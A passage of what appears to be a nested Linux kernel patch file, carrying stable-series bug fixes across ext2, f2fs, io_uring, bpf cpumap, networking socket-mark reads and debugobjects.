+ 		es->s_max_mnt_count = cpu_to_le16(EXT2_DFL_MAX_MNT_COUNT);
+ 	le16_add_cpu(&es->s_mnt_count, 1);
+ 	if (test_opt (sb, DEBUG))
+-		ext2_msg(sb, KERN_INFO, "%s, %s, bs=%lu, fs=%lu, gc=%lu, "
++		ext2_msg(sb, KERN_INFO, "%s, %s, bs=%lu, gc=%lu, "
+ 			"bpg=%lu, ipg=%lu, mo=%04lx]",
+ 			EXT2FS_VERSION, EXT2FS_DATE, sb->s_blocksize,
+-			sbi->s_frag_size,
+ 			sbi->s_groups_count,
+ 			EXT2_BLOCKS_PER_GROUP(sb),
+ 			EXT2_INODES_PER_GROUP(sb),
+@@ -1012,14 +1011,7 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 		}
+ 	}
+ 
+-	sbi->s_frag_size = EXT2_MIN_FRAG_SIZE <<
+-				   le32_to_cpu(es->s_log_frag_size);
+-	if (sbi->s_frag_size == 0)
+-		goto cantfind_ext2;
+-	sbi->s_frags_per_block = sb->s_blocksize / sbi->s_frag_size;
+-
+ 	sbi->s_blocks_per_group = le32_to_cpu(es->s_blocks_per_group);
+-	sbi->s_frags_per_group = le32_to_cpu(es->s_frags_per_group);
+ 	sbi->s_inodes_per_group = le32_to_cpu(es->s_inodes_per_group);
+ 
+ 	sbi->s_inodes_per_block = sb->s_blocksize / EXT2_INODE_SIZE(sb);
+@@ -1045,11 +1037,10 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 		goto failed_mount;
+ 	}
+ 
+-	if (sb->s_blocksize != sbi->s_frag_size) {
++	if (es->s_log_frag_size != es->s_log_block_size) {
+ 		ext2_msg(sb, KERN_ERR,
+-			"error: fragsize %lu != blocksize %lu"
+-			"(not supported yet)",
+-			sbi->s_frag_size, sb->s_blocksize);
++			"error: fragsize log %u != blocksize log %u",
++			le32_to_cpu(es->s_log_frag_size), sb->s_blocksize_bits);
+ 		goto failed_mount;
+ 	}
+ 
+@@ -1066,12 +1057,6 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 			sbi->s_blocks_per_group, sbi->s_inodes_per_group + 3);
+ 		goto failed_mount;
+ 	}
+-	if (sbi->s_frags_per_group > sb->s_blocksize * 8) {
+-		ext2_msg(sb, KERN_ERR,
+-			"error: #fragments per group too big: %lu",
+-			sbi->s_frags_per_group);
+-		goto failed_mount;
+-	}
+ 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
+ 	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+ 		ext2_msg(sb, KERN_ERR,
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 4d1e48c676fab..78f39a78de29a 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3431,7 +3431,6 @@ static inline bool __is_valid_data_blkaddr(block_t blkaddr)
+  * file.c
+  */
+ int f2fs_sync_file(struct file *file, loff_t start, loff_t end, int datasync);
+-void f2fs_truncate_data_blocks(struct dnode_of_data *dn);
+ int f2fs_do_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate(struct inode *inode);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 7b94f047cbf79..3ce6da4fac9c6 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -628,11 +628,6 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 					 dn->ofs_in_node, nr_free);
+ }
+ 
+-void f2fs_truncate_data_blocks(struct dnode_of_data *dn)
+-{
+-	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
+-}
+-
+ static int truncate_partial_data_page(struct inode *inode, u64 from,
+ 								bool cache_only)
+ {
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index a010b4bc36d2c..9fe502485930f 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -923,6 +923,7 @@ static int truncate_node(struct dnode_of_data *dn)
+ 
+ static int truncate_dnode(struct dnode_of_data *dn)
+ {
++	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+ 	struct page *page;
+ 	int err;
+ 
+@@ -930,16 +931,25 @@ static int truncate_dnode(struct dnode_of_data *dn)
+ 		return 1;
+ 
+ 	/* get direct node */
+-	page = f2fs_get_node_page(F2FS_I_SB(dn->inode), dn->nid);
++	page = f2fs_get_node_page(sbi, dn->nid);
+ 	if (PTR_ERR(page) == -ENOENT)
+ 		return 1;
+ 	else if (IS_ERR(page))
+ 		return PTR_ERR(page);
+ 
++	if (IS_INODE(page) || ino_of_node(page) != dn->inode->i_ino) {
++		f2fs_err(sbi, "incorrect node reference, ino: %lu, nid: %u, ino_of_node: %u",
++				dn->inode->i_ino, dn->nid, ino_of_node(page));
++		set_sbi_flag(sbi, SBI_NEED_FSCK);
++		f2fs_handle_error(sbi, ERROR_INVALID_NODE_REFERENCE);
++		f2fs_put_page(page, 1);
++		return -EFSCORRUPTED;
++	}
++
+ 	/* Make dnode_of_data for parameter */
+ 	dn->node_page = page;
+ 	dn->ofs_in_node = 0;
+-	f2fs_truncate_data_blocks(dn);
++	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
+ 	err = truncate_node(dn);
+ 	if (err) {
+ 		f2fs_put_page(page, 1);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index b6dad389fa144..ff47aad636e5b 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1347,6 +1347,12 @@ default_check:
+ 		return -EINVAL;
+ 	}
+ 
++	if ((f2fs_sb_has_readonly(sbi) || f2fs_readonly(sbi->sb)) &&
++		test_opt(sbi, FLUSH_MERGE)) {
++		f2fs_err(sbi, "FLUSH_MERGE not compatible with readonly mode");
++		return -EINVAL;
++	}
++
+ 	if (f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb)) {
+ 		f2fs_err(sbi, "Allow to mount readonly mode only");
+ 		return -EROFS;
+@@ -1933,8 +1939,10 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 		seq_puts(seq, ",inline_dentry");
+ 	else
+ 		seq_puts(seq, ",noinline_dentry");
+-	if (!f2fs_readonly(sbi->sb) && test_opt(sbi, FLUSH_MERGE))
++	if (test_opt(sbi, FLUSH_MERGE))
+ 		seq_puts(seq, ",flush_merge");
++	else
++		seq_puts(seq, ",noflush_merge");
+ 	if (test_opt(sbi, NOBARRIER))
+ 		seq_puts(seq, ",nobarrier");
+ 	if (test_opt(sbi, FASTBOOT))
+@@ -2032,9 +2040,22 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 	return 0;
+ }
+ 
+-static void default_options(struct f2fs_sb_info *sbi)
++static void default_options(struct f2fs_sb_info *sbi, bool remount)
+ {
+ 	/* init some FS parameters */
++	if (!remount) {
++		set_opt(sbi, READ_EXTENT_CACHE);
++		clear_opt(sbi, DISABLE_CHECKPOINT);
++
++		if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
++			set_opt(sbi, DISCARD);
++
++		if (f2fs_sb_has_blkzoned(sbi))
++			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
++		else
++			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
++	}
++
+ 	if (f2fs_sb_has_readonly(sbi))
+ 		F2FS_OPTION(sbi).active_logs = NR_CURSEG_RO_TYPE;
+ 	else
+@@ -2057,22 +2078,16 @@ static void default_options(struct f2fs_sb_info *sbi)
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
+-	set_opt(sbi, READ_EXTENT_CACHE);
+ 	set_opt(sbi, NOHEAP);
+-	clear_opt(sbi, DISABLE_CHECKPOINT);
+ 	set_opt(sbi, MERGE_CHECKPOINT);
+ 	F2FS_OPTION(sbi).unusable_cap = 0;
+ 	sbi->sb->s_flags |= SB_LAZYTIME;
+-	set_opt(sbi, FLUSH_MERGE);
+-	if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
+-		set_opt(sbi, DISCARD);
+-	if (f2fs_sb_has_blkzoned(sbi)) {
++	if (!f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb))
++		set_opt(sbi, FLUSH_MERGE);
++	if (f2fs_sb_has_blkzoned(sbi))
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_LFS;
+-		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
+-	} else {
++	else
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_ADAPTIVE;
+-		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
+-	}
+ 
+ #ifdef CONFIG_F2FS_FS_XATTR
+ 	set_opt(sbi, XATTR_USER);
+@@ -2244,7 +2259,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 			clear_sbi_flag(sbi, SBI_NEED_SB_WRITE);
+ 	}
+ 
+-	default_options(sbi);
++	default_options(sbi, true);
+ 
+ 	/* parse mount options */
+ 	err = parse_options(sb, data, true);
+@@ -4141,7 +4156,7 @@ try_onemore:
+ 		sbi->s_chksum_seed = f2fs_chksum(sbi, ~0, raw_super->uuid,
+ 						sizeof(raw_super->uuid));
+ 
+-	default_options(sbi);
++	default_options(sbi, false);
+ 	/* parse mount options */
+ 	options = kstrdup((const char *)data, GFP_KERNEL);
+ 	if (data && !options) {
+diff --git a/fs/file.c b/fs/file.c
+index 35c62b54c9d65..dbca26ef7a01a 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -1036,12 +1036,28 @@ unsigned long __fdget_raw(unsigned int fd)
+ 	return __fget_light(fd, 0);
+ }
+ 
++/*
++ * Try to avoid f_pos locking. We only need it if the
++ * file is marked for FMODE_ATOMIC_POS, and it can be
++ * accessed multiple ways.
++ *
++ * Always do it for directories, because pidfd_getfd()
++ * can make a file accessible even if it otherwise would
++ * not be, and for directories this is a correctness
++ * issue, not a "POSIX requirement".
++ */
++static inline bool file_needs_f_pos_lock(struct file *file)
++{
++	return (file->f_mode & FMODE_ATOMIC_POS) &&
++		(file_count(file) > 1 || S_ISDIR(file_inode(file)->i_mode));
++}
++
+ unsigned long __fdget_pos(unsigned int fd)
+ {
+ 	unsigned long v = __fdget(fd);
+ 	struct file *file = (struct file *)(v & ~3);
+ 
+-	if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
++	if (file && file_needs_f_pos_lock(file)) {
+ 		v |= FDPUT_POS_UNLOCK;
+ 		mutex_lock(&file->f_pos_lock);
+ 	}
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index c0c6bcbc8c05c..81c22df27c725 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -52,7 +52,7 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 
+ 	if (!attr->non_res) {
+ 		lsize = le32_to_cpu(attr->res.data_size);
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS);
++		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+@@ -80,7 +80,7 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 		if (err < 0)
+ 			goto out;
+ 
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS);
++		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+diff --git a/fs/open.c b/fs/open.c
+index 9541430ec5b30..51dc46620d033 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1233,7 +1233,7 @@ inline int build_open_flags(const struct open_how *how, struct open_flags *op)
+ 		lookup_flags |= LOOKUP_IN_ROOT;
+ 	if (how->resolve & RESOLVE_CACHED) {
+ 		/* Don't bother even trying for create/truncate/tmpfile open */
+-		if (flags & (O_TRUNC | O_CREAT | O_TMPFILE))
++		if (flags & (O_TRUNC | O_CREAT | __O_TMPFILE))
+ 			return -EAGAIN;
+ 		lookup_flags |= LOOKUP_CACHED;
+ 	}
+diff --git a/fs/super.c b/fs/super.c
+index 7c140ee60c547..d138332e57a94 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -904,6 +904,7 @@ int reconfigure_super(struct fs_context *fc)
+ 	struct super_block *sb = fc->root->d_sb;
+ 	int retval;
+ 	bool remount_ro = false;
++	bool remount_rw = false;
+ 	bool force = fc->sb_flags & SB_FORCE;
+ 
+ 	if (fc->sb_flags_mask & ~MS_RMT_MASK)
+@@ -921,7 +922,7 @@ int reconfigure_super(struct fs_context *fc)
+ 		    bdev_read_only(sb->s_bdev))
+ 			return -EACCES;
+ #endif
+-
++		remount_rw = !(fc->sb_flags & SB_RDONLY) && sb_rdonly(sb);
+ 		remount_ro = (fc->sb_flags & SB_RDONLY) && !sb_rdonly(sb);
+ 	}
+ 
+@@ -951,6 +952,14 @@ int reconfigure_super(struct fs_context *fc)
+ 			if (retval)
+ 				return retval;
+ 		}
++	} else if (remount_rw) {
++		/*
++		 * We set s_readonly_remount here to protect filesystem's
++		 * reconfigure code from writes from userspace until
++		 * reconfigure finishes.
++		 */
++		sb->s_readonly_remount = 1;
++		smp_wmb();
+ 	}
+ 
+ 	if (fc->ops->reconfigure) {
+diff --git a/fs/sysv/itree.c b/fs/sysv/itree.c
+index 3b8567564e7e4..9925cfe571595 100644
+--- a/fs/sysv/itree.c
++++ b/fs/sysv/itree.c
+@@ -145,6 +145,10 @@ static int alloc_branch(struct inode *inode,
+ 		 */
+ 		parent = block_to_cpu(SYSV_SB(inode->i_sb), branch[n-1].key);
+ 		bh = sb_getblk(inode->i_sb, parent);
++		if (!bh) {
++			sysv_free_block(inode->i_sb, branch[n].key);
++			break;
++		}
+ 		lock_buffer(bh);
+ 		memset(bh->b_data, 0, blocksize);
+ 		branch[n].bh = bh;
+diff --git a/include/asm-generic/word-at-a-time.h b/include/asm-generic/word-at-a-time.h
+index 20c93f08c9933..95a1d214108a5 100644
+--- a/include/asm-generic/word-at-a-time.h
++++ b/include/asm-generic/word-at-a-time.h
+@@ -38,7 +38,7 @@ static inline long find_zero(unsigned long mask)
+ 	return (mask >> 8) ? byte : byte + 1;
+ }
+ 
+-static inline bool has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
++static inline unsigned long has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
+ {
+ 	unsigned long rhs = val | c->low_bits;
+ 	*data = rhs;
+diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
+index ee0d75d9a302d..77055b239165a 100644
+--- a/include/linux/f2fs_fs.h
++++ b/include/linux/f2fs_fs.h
+@@ -104,6 +104,7 @@ enum f2fs_error {
+ 	ERROR_INCONSISTENT_SIT,
+ 	ERROR_CORRUPTED_VERITY_XATTR,
+ 	ERROR_CORRUPTED_XATTR,
++	ERROR_INVALID_NODE_REFERENCE,
+ 	ERROR_MAX,
+ };
+ 
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index 51857117ac099..c8ef3b881f03d 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -107,11 +107,12 @@ static inline struct inet_request_sock *inet_rsk(const struct request_sock *sk)
+ 
+ static inline u32 inet_request_mark(const struct sock *sk, struct sk_buff *skb)
+ {
+-	if (!sk->sk_mark &&
+-	    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_fwmark_accept))
++	u32 mark = READ_ONCE(sk->sk_mark);
++
++	if (!mark && READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_fwmark_accept))
+ 		return skb->mark;
+ 
+-	return sk->sk_mark;
++	return mark;
+ }
+ 
+ static inline int inet_request_bound_dev_if(const struct sock *sk,
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 83a1a9bc3ceb1..530e7257e4389 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -93,7 +93,7 @@ static inline void ipcm_init_sk(struct ipcm_cookie *ipcm,
+ {
+ 	ipcm_init(ipcm);
+ 
+-	ipcm->sockc.mark = inet->sk.sk_mark;
++	ipcm->sockc.mark = READ_ONCE(inet->sk.sk_mark);
+ 	ipcm->sockc.tsflags = inet->sk.sk_tsflags;
+ 	ipcm->oif = READ_ONCE(inet->sk.sk_bound_dev_if);
+ 	ipcm->addr = inet->inet_saddr;
+diff --git a/include/net/route.h b/include/net/route.h
+index fe00b0a2e4759..af8431b25f800 100644
+--- a/include/net/route.h
++++ b/include/net/route.h
+@@ -171,7 +171,7 @@ static inline struct rtable *ip_route_output_ports(struct net *net, struct flowi
+ 						   __be16 dport, __be16 sport,
+ 						   __u8 proto, __u8 tos, int oif)
+ {
+-	flowi4_init_output(fl4, oif, sk ? sk->sk_mark : 0, tos,
++	flowi4_init_output(fl4, oif, sk ? READ_ONCE(sk->sk_mark) : 0, tos,
+ 			   RT_SCOPE_UNIVERSE, proto,
+ 			   sk ? inet_sk_flowi_flags(sk) : 0,
+ 			   daddr, saddr, dport, sport, sock_net_uid(net, sk));
+@@ -304,7 +304,7 @@ static inline void ip_route_connect_init(struct flowi4 *fl4, __be32 dst,
+ 	if (inet_sk(sk)->transparent)
+ 		flow_flags |= FLOWI_FLAG_ANYSRC;
+ 
+-	flowi4_init_output(fl4, oif, sk->sk_mark, ip_sock_rt_tos(sk),
++	flowi4_init_output(fl4, oif, READ_ONCE(sk->sk_mark), ip_sock_rt_tos(sk),
+ 			   ip_sock_rt_scope(sk), protocol, flow_flags, dst,
+ 			   src, dport, sport, sk->sk_uid);
+ }
+diff --git a/include/net/vxlan.h b/include/net/vxlan.h
+index 03bcc1ef0d61e..a46ec889acb73 100644
+--- a/include/net/vxlan.h
++++ b/include/net/vxlan.h
+@@ -548,12 +548,12 @@ static inline void vxlan_flag_attr_error(int attrtype,
+ }
+ 
+ static inline bool vxlan_fdb_nh_path_select(struct nexthop *nh,
+-					    int hash,
++					    u32 hash,
+ 					    struct vxlan_rdst *rdst)
+ {
+ 	struct fib_nh_common *nhc;
+ 
+-	nhc = nexthop_path_fdb_result(nh, hash);
++	nhc = nexthop_path_fdb_result(nh, hash >> 1);
+ 	if (unlikely(!nhc))
+ 		return false;
+ 
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index f091153bc8540..ed8e9deae284a 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2349,12 +2349,21 @@ int io_run_task_work_sig(struct io_ring_ctx *ctx)
+ 	return 0;
+ }
+ 
++static bool current_pending_io(void)
++{
++	struct io_uring_task *tctx = current->io_uring;
++
++	if (!tctx)
++		return false;
++	return percpu_counter_read_positive(&tctx->inflight);
++}
++
+ /* when returns >0, the caller should retry */
+ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 					  struct io_wait_queue *iowq,
+ 					  ktime_t *timeout)
+ {
+-	int token, ret;
++	int io_wait, ret;
+ 	unsigned long check_cq;
+ 
+ 	/* make sure we run task_work before checking for signals */
+@@ -2372,15 +2381,17 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 	}
+ 
+ 	/*
+-	 * Use io_schedule_prepare/finish, so cpufreq can take into account
+-	 * that the task is waiting for IO - turns out to be important for low
+-	 * QD IO.
++	 * Mark us as being in io_wait if we have pending requests, so cpufreq
++	 * can take into account that the task is waiting for IO - turns out
++	 * to be important for low QD IO.
+ 	 */
+-	token = io_schedule_prepare();
++	io_wait = current->in_iowait;
++	if (current_pending_io())
++		current->in_iowait = 1;
+ 	ret = 1;
+ 	if (!schedule_hrtimeout(timeout, HRTIMER_MODE_ABS))
+ 		ret = -ETIME;
+-	io_schedule_finish(token);
++	current->in_iowait = io_wait;
+ 	return ret;
+ }
+ 
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index 4c6a5666541cf..b0cf05ebcbcc3 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -545,7 +545,7 @@ int io_timeout(struct io_kiocb *req, unsigned int issue_flags)
+ 		goto add;
+ 	}
+ 
+-	tail = ctx->cached_cq_tail - atomic_read(&ctx->cq_timeouts);
++	tail = data_race(ctx->cached_cq_tail) - atomic_read(&ctx->cq_timeouts);
+ 	timeout->target_seq = tail + off;
+ 
+ 	/* Update the last seq here in case io_flush_timeouts() hasn't.
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index 09141351d5457..08a8e81027289 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -26,6 +26,7 @@
+ #include <linux/workqueue.h>
+ #include <linux/kthread.h>
+ #include <linux/capability.h>
++#include <linux/completion.h>
+ #include <trace/events/xdp.h>
+ #include <linux/btf_ids.h>
+ 
+@@ -71,6 +72,7 @@ struct bpf_cpu_map_entry {
+ 	struct rcu_head rcu;
+ 
+ 	struct work_struct kthread_stop_wq;
++	struct completion kthread_running;
+ };
+ 
+ struct bpf_cpu_map {
+@@ -134,11 +136,17 @@ static void __cpu_map_ring_cleanup(struct ptr_ring *ring)
+ 	 * invoked cpu_map_kthread_stop(). Catch any broken behaviour
+ 	 * gracefully and warn once.
+ 	 */
+-	struct xdp_frame *xdpf;
++	void *ptr;
+ 
+-	while ((xdpf = ptr_ring_consume(ring)))
+-		if (WARN_ON_ONCE(xdpf))
+-			xdp_return_frame(xdpf);
++	while ((ptr = ptr_ring_consume(ring))) {
++		WARN_ON_ONCE(1);
++		if (unlikely(__ptr_test_bit(0, &ptr))) {
++			__ptr_clear_bit(0, &ptr);
++			kfree_skb(ptr);
++			continue;
++		}
++		xdp_return_frame(ptr);
++	}
+ }
+ 
+ static void put_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+@@ -158,7 +166,6 @@ static void put_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+ static void cpu_map_kthread_stop(struct work_struct *work)
+ {
+ 	struct bpf_cpu_map_entry *rcpu;
+-	int err;
+ 
+ 	rcpu = container_of(work, struct bpf_cpu_map_entry, kthread_stop_wq);
+ 
+@@ -168,14 +175,7 @@ static void cpu_map_kthread_stop(struct work_struct *work)
+ 	rcu_barrier();
+ 
+ 	/* kthread_stop will wake_up_process and wait for it to complete */
+-	err = kthread_stop(rcpu->kthread);
+-	if (err) {
+-		/* kthread_stop may be called before cpu_map_kthread_run
+-		 * is executed, so we need to release the memory related
+-		 * to rcpu.
+-		 */
+-		put_cpu_map_entry(rcpu);
+-	}
++	kthread_stop(rcpu->kthread);
+ }
+ 
+ static void cpu_map_bpf_prog_run_skb(struct bpf_cpu_map_entry *rcpu,
+@@ -303,11 +303,11 @@ static int cpu_map_bpf_prog_run(struct bpf_cpu_map_entry *rcpu, void **frames,
+ 	return nframes;
+ }
+ 
+-
+ static int cpu_map_kthread_run(void *data)
+ {
+ 	struct bpf_cpu_map_entry *rcpu = data;
+ 
++	complete(&rcpu->kthread_running);
+ 	set_current_state(TASK_INTERRUPTIBLE);
+ 
+ 	/* When kthread gives stop order, then rcpu have been disconnected
+@@ -472,6 +472,7 @@ __cpu_map_entry_alloc(struct bpf_map *map, struct bpf_cpumap_val *value,
+ 		goto free_ptr_ring;
+ 
+ 	/* Setup kthread */
++	init_completion(&rcpu->kthread_running);
+ 	rcpu->kthread = kthread_create_on_node(cpu_map_kthread_run, rcpu, numa,
+ 					       "cpumap/%d/map:%d", cpu,
+ 					       map->id);
+@@ -485,6 +486,12 @@ __cpu_map_entry_alloc(struct bpf_map *map, struct bpf_cpumap_val *value,
+ 	kthread_bind(rcpu->kthread, cpu);
+ 	wake_up_process(rcpu->kthread);
+ 
++	/* Make sure kthread has been running, so kthread_stop() will not
++	 * stop the kthread prematurely and all pending frames or skbs
++	 * will be handled by the kthread before kthread_stop() returns.
++	 */
++	wait_for_completion(&rcpu->kthread_running);
++
+ 	return rcpu;
+ 
+ free_prog:
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 934332b3eb541..db1065daabb62 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1133,6 +1133,11 @@ static int perf_mux_hrtimer_restart(struct perf_cpu_context *cpuctx)
+ 	return 0;
+ }
+ 
++static int perf_mux_hrtimer_restart_ipi(void *arg)
++{
++	return perf_mux_hrtimer_restart(arg);
++}
++
+ void perf_pmu_disable(struct pmu *pmu)
+ {
+ 	int *count = this_cpu_ptr(pmu->pmu_disable_count);
+@@ -11155,8 +11160,7 @@ perf_event_mux_interval_ms_store(struct device *dev,
+ 		cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
+ 		cpuctx->hrtimer_interval = ns_to_ktime(NSEC_PER_MSEC * timer);
+ 
+-		cpu_function_call(cpu,
+-			(remote_function_f)perf_mux_hrtimer_restart, cpuctx);
++		cpu_function_call(cpu, perf_mux_hrtimer_restart_ipi, cpuctx);
+ 	}
+ 	cpus_read_unlock();
+ 	mutex_unlock(&mux_interval_mutex);
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 1642548892a8e..ad04390883ada 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -662,8 +662,7 @@ static DEFINE_PER_CPU(int, bpf_trace_nest_level);
+ BPF_CALL_5(bpf_perf_event_output, struct pt_regs *, regs, struct bpf_map *, map,
+ 	   u64, flags, void *, data, u64, size)
+ {
+-	struct bpf_trace_sample_data *sds = this_cpu_ptr(&bpf_trace_sds);
+-	int nest_level = this_cpu_inc_return(bpf_trace_nest_level);
++	struct bpf_trace_sample_data *sds;
+ 	struct perf_raw_record raw = {
+ 		.frag = {
+ 			.size = size,
+@@ -671,7 +670,11 @@ BPF_CALL_5(bpf_perf_event_output, struct pt_regs *, regs, struct bpf_map *, map,
+ 		},
+ 	};
+ 	struct perf_sample_data *sd;
+-	int err;
++	int nest_level, err;
++
++	preempt_disable();
++	sds = this_cpu_ptr(&bpf_trace_sds);
++	nest_level = this_cpu_inc_return(bpf_trace_nest_level);
+ 
+ 	if (WARN_ON_ONCE(nest_level > ARRAY_SIZE(sds->sds))) {
+ 		err = -EBUSY;
+@@ -690,9 +693,9 @@ BPF_CALL_5(bpf_perf_event_output, struct pt_regs *, regs, struct bpf_map *, map,
+ 	sd->sample_flags |= PERF_SAMPLE_RAW;
+ 
+ 	err = __bpf_perf_event_output(regs, map, flags, sd);
+-
+ out:
+ 	this_cpu_dec(bpf_trace_nest_level);
++	preempt_enable();
+ 	return err;
+ }
+ 
+@@ -717,7 +720,6 @@ static DEFINE_PER_CPU(struct bpf_trace_sample_data, bpf_misc_sds);
+ u64 bpf_event_output(struct bpf_map *map, u64 flags, void *meta, u64 meta_size,
+ 		     void *ctx, u64 ctx_size, bpf_ctx_copy_t ctx_copy)
+ {
+-	int nest_level = this_cpu_inc_return(bpf_event_output_nest_level);
+ 	struct perf_raw_frag frag = {
+ 		.copy		= ctx_copy,
+ 		.size		= ctx_size,
+@@ -734,8 +736,12 @@ u64 bpf_event_output(struct bpf_map *map, u64 flags, void *meta, u64 meta_size,
+ 	};
+ 	struct perf_sample_data *sd;
+ 	struct pt_regs *regs;
++	int nest_level;
+ 	u64 ret;
+ 
++	preempt_disable();
++	nest_level = this_cpu_inc_return(bpf_event_output_nest_level);
++
+ 	if (WARN_ON_ONCE(nest_level > ARRAY_SIZE(bpf_misc_sds.sds))) {
+ 		ret = -EBUSY;
+ 		goto out;
+@@ -751,6 +757,7 @@ u64 bpf_event_output(struct bpf_map *map, u64 flags, void *meta, u64 meta_size,
+ 	ret = __bpf_perf_event_output(regs, map, flags, sd);
+ out:
+ 	this_cpu_dec(bpf_event_output_nest_level);
++	preempt_enable();
+ 	return ret;
+ }
+ 
+diff --git a/lib/Makefile b/lib/Makefile
+index 59bd7c2f793a7..5ffe72ec99797 100644
+--- a/lib/Makefile
++++ b/lib/Makefile
+@@ -81,8 +81,14 @@ obj-$(CONFIG_TEST_STATIC_KEYS) += test_static_key_base.o
+ obj-$(CONFIG_TEST_DYNAMIC_DEBUG) += test_dynamic_debug.o
+ obj-$(CONFIG_TEST_PRINTF) += test_printf.o
+ obj-$(CONFIG_TEST_SCANF) += test_scanf.o
++
+ obj-$(CONFIG_TEST_BITMAP) += test_bitmap.o
+ obj-$(CONFIG_TEST_STRSCPY) += test_strscpy.o
++ifeq ($(CONFIG_CC_IS_CLANG)$(CONFIG_KASAN),yy)
++# FIXME: Clang breaks test_bitmap_const_eval when KASAN and GCOV are enabled
++GCOV_PROFILE_test_bitmap.o := n
++endif
++
+ obj-$(CONFIG_TEST_UUID) += test_uuid.o
+ obj-$(CONFIG_TEST_XARRAY) += test_xarray.o
+ obj-$(CONFIG_TEST_MAPLE_TREE) += test_maple_tree.o
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index c46736210363a..dacb80c22c4f1 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -498,6 +498,15 @@ static void debug_print_object(struct debug_obj *obj, char *msg)
+ 	const struct debug_obj_descr *descr = obj->descr;
+ 	static int limit;
+ 
++	/*
++	 * Don't report if lookup_object_or_alloc() by the current thread
++	 * failed because lookup_object_or_alloc()/debug_objects_oom() by a
++	 * concurrent thread turned off debug_objects_enabled and cleared
++	 * the hash buckets.
++	 */
++	if (!debug_objects_enabled)
++		return;
++
+ 	if (limit < 5 && descr != descr_test) {
+ 		void *hint = descr->debug_hint ?
